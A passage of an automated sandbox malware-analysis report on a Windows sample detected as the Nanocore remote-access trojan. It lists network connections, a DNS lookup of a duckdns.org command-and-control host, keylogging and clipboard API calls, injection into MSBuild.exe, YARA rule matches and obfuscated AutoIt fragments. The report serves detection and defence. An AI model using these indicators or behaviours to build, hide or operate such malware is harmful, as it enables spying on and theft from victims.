        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.137
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.137
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.3
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.3
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.3
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.3
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B24EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,
        Source: unknownDNS traffic detected: queries for: nickdns22.duckdns.org
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49678
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49680
        Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B26B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B26B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B12B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,
        Source: MSBuild.exe, 00000001.00000002.506144635.0000000004237000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B3F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271444050.00000000044E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.287551362.0000000004581000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.269052958.000000000454C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.237700588.00000000017A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.232372398.000000000149D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.506144635.0000000004237000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.286334104.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271541337.00000000044B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.507400342.0000000005E00000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.268804355.00000000044B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.232471395.000000000173A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.237121174.00000000017D3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271021731.0000000001204000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.236754982.0000000004671000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.237756346.000000000149D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.268781078.00000000011D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.287492907.0000000003581000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.239247131.000000000176C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.236584811.00000000016C4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.268745620.00000000011D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.274048307.00000000011D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.269076218.000000000126A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.268921996.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.234856164.0000000001739000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.272132273.00000000011A4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271693708.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.232598333.000000000149D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.235161139.00000000016F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.233676128.000000000176D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.498286656.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5796, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: qnJXJsqt1M.exe PID: 2764, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: znytpstdcrwsisx.exe PID: 3192, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4156, type: MEMORY
        Source: Yara matchFile source: 11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.3.znytpstdcrwsisx.exe.11d0fe8.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.17297f8.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.45ceac4.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.45d30ed.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.4239c8e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.5e00000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.45ceac4.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.176cb50.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.42430ed.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.176cb50.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.423eac4.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.176cb50.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.45c9c8e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.1739f48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.423eac4.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.5e04629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.1739f48.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.5e00000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.1739f48.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.1739f48.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.16ec7e0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.17293d8.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.17293d8.0.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000003.271444050.00000000044E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000003.271444050.00000000044E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.287551362.0000000004581000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000003.269052958.000000000454C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000003.269052958.000000000454C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.237700588.00000000017A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.237700588.00000000017A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.232372398.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.232372398.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000001.00000002.506144635.0000000004237000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.286334104.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.286334104.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000003.271541337.00000000044B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000003.271541337.00000000044B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000001.00000002.507400342.0000000005E00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000003.268804355.00000000044B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000003.268804355.00000000044B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.232471395.000000000173A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.232471395.000000000173A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.237121174.00000000017D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.237121174.00000000017D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000003.271021731.0000000001204000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000003.271021731.0000000001204000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.236754982.0000000004671000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.236754982.0000000004671000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.237756346.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.237756346.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000003.268781078.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000003.268781078.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.239247131.000000000176C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.239247131.000000000176C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.236584811.00000000016C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.236584811.00000000016C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000003.268745620.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000003.268745620.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000003.274048307.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000003.274048307.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000003.269076218.000000000126A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000003.269076218.000000000126A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000003.268921996.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000003.268921996.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.234856164.0000000001739000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.234856164.0000000001739000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000003.272132273.00000000011A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000003.272132273.00000000011A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000003.271693708.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000003.271693708.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.232598333.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.232598333.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000001.00000002.507018944.0000000005610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.235161139.00000000016F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.235161139.00000000016F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.233676128.000000000176D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.233676128.000000000176D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000001.00000002.498286656.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000001.00000002.498286656.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: MSBuild.exe PID: 5796, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: MSBuild.exe PID: 5796, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: qnJXJsqt1M.exe PID: 2764, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: qnJXJsqt1M.exe PID: 2764, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: znytpstdcrwsisx.exe PID: 3192, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: znytpstdcrwsisx.exe PID: 3192, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: MSBuild.exe PID: 4156, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: MSBuild.exe PID: 4156, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.35a3c74.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.3.znytpstdcrwsisx.exe.11d0fe8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.3.znytpstdcrwsisx.exe.11d0fe8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.3.qnJXJsqt1M.exe.17297f8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.17297f8.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.45ceac4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.45d30ed.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.35917f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.MSBuild.exe.4239c8e.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.MSBuild.exe.4239c8e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.MSBuild.exe.5e00000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.45ceac4.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.176cb50.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.176cb50.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.MSBuild.exe.42430ed.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.MSBuild.exe.5610000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.176cb50.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.176cb50.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.MSBuild.exe.423eac4.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.MSBuild.exe.3201358.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.176cb50.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.176cb50.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.45c9c8e.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.45c9c8e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.3.qnJXJsqt1M.exe.1739f48.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.1739f48.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.MSBuild.exe.423eac4.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.MSBuild.exe.5e04629.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.1739f48.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.1739f48.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.MSBuild.exe.5e00000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.1739f48.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.1739f48.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.3.qnJXJsqt1M.exe.17297f8.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.1739f48.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.1739f48.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.3.qnJXJsqt1M.exe.16ec7e0.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.16ec7e0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.3.qnJXJsqt1M.exe.17293d8.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.17293d8.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.3.qnJXJsqt1M.exe.17293d8.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.qnJXJsqt1M.exe.17293d8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        AutoIt script contains suspicious stringsShow sources
        Source: qnJXJsqt1M.exeAutoIt Script: T0JYH = $I31330D6 ("vmtoolsd.exera2khkzkmkkprl7yom4g
        Source: qnJXJsqt1M.exeAutoIt Script: EN $S32383033JPB = DLLCALLADDRESS ($C31333233O8ISGY ,
        Source: znytpstdcrwsisx.exe.0.drAutoIt Script: T0JYH = $I31330D6 ("vmtoolsd.exera2khkzkmkkprl7yom4g
        Source: znytpstdcrwsisx.exe.0.drAutoIt Script: EN $S32383033JPB = DLLCALLADDRESS ($C31333233O8ISGY ,
        Binary is likely a compiled AutoIt script fileShow sources
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: This is a third-party compiled AutoIt script.
